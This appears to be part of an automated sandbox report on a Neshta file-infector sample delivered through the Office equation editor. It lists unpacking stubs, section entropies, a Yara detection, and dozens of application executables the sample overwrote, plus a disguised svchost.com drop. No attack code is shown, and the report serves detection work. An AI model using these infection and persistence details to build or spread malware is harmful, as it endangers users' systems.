Source: C:\Users\Public\vbc.exe Code function: 5_2_004070F4 push 00407120h; ret 5_2_00407118
Source: C:\Users\Public\vbc.exe Code function: 5_2_004041D8 push 00404204h; ret 5_2_004041FC
Source: C:\Users\Public\vbc.exe Code function: 5_2_004041A0 push 004041CCh; ret 5_2_004041C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404256 push 00404284h; ret 5_2_0040427C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404258 push 00404284h; ret 5_2_0040427C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404210 push 0040423Ch; ret 5_2_00404234
Source: C:\Users\Public\vbc.exe Code function: 5_2_004042C8 push 004042F4h; ret 5_2_004042EC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404290 push 004042BCh; ret 5_2_004042B4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404370 push 0040439Ch; ret 5_2_00404394
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404300 push 0040432Ch; ret 5_2_00404324
Source: C:\Users\Public\vbc.exe Code function: 5_2_00404338 push 00404364h; ret 5_2_0040435C
Source: C:\Users\Public\vbc.exe Code function: 5_2_004043E0 push 0040440Ch; ret 5_2_00404404
Source: C:\Users\Public\vbc.exe Code function: 5_2_004043A8 push 004043D4h; ret 5_2_004043CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00406CE0 push 00406D36h; ret 5_2_00406D2E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D28 push 00403D79h; ret 5_2_00403D71
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403F58 push 00403F84h; ret 5_2_00403F7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403F90 push 00403FBCh; ret 5_2_00403FB4
Source: initial sample Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample Static PE information: section name: .text entropy: 7.78687431178
Source: initial sample Static PE information: section name: .text entropy: 6.88560633445
Source: initial sample Static PE information: section name: .text entropy: 7.00368298001
Source: initial sample Static PE information: section name: .text entropy: 7.00336954384
Source: initial sample Static PE information: section name: .text entropy: 7.4909885878
Source: initial sample Static PE information: section name: .text entropy: 7.49148131754
Source: initial sample Static PE information: section name: .text entropy: 6.8868280667
Source: initial sample Static PE information: section name: .text entropy: 7.12964019221
Source: initial sample Static PE information: section name: .text entropy: 6.95263910497
Source: initial sample Static PE information: section name: .text entropy: 7.34326857021
Source: initial sample Static PE information: section name: .text entropy: 7.17347995787
Source: initial sample Static PE information: section name: .text entropy: 7.84217762577

Persistence and Installation Behavior:

barindex
Yara detected Neshta
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Infects executable files (exe, dll, sys, html)
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe Jump to behavior
Drops PE files with a suspicious file extension
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Jump to behavior
Source: C:\Users\Public\vbc.exe File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to behavior
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Jump to dropped file
Drops PE files
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Windows\svchost.com Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\WinDirStat\windirstat.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\WinDirStat\Uninstall.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe Jump to dropped file
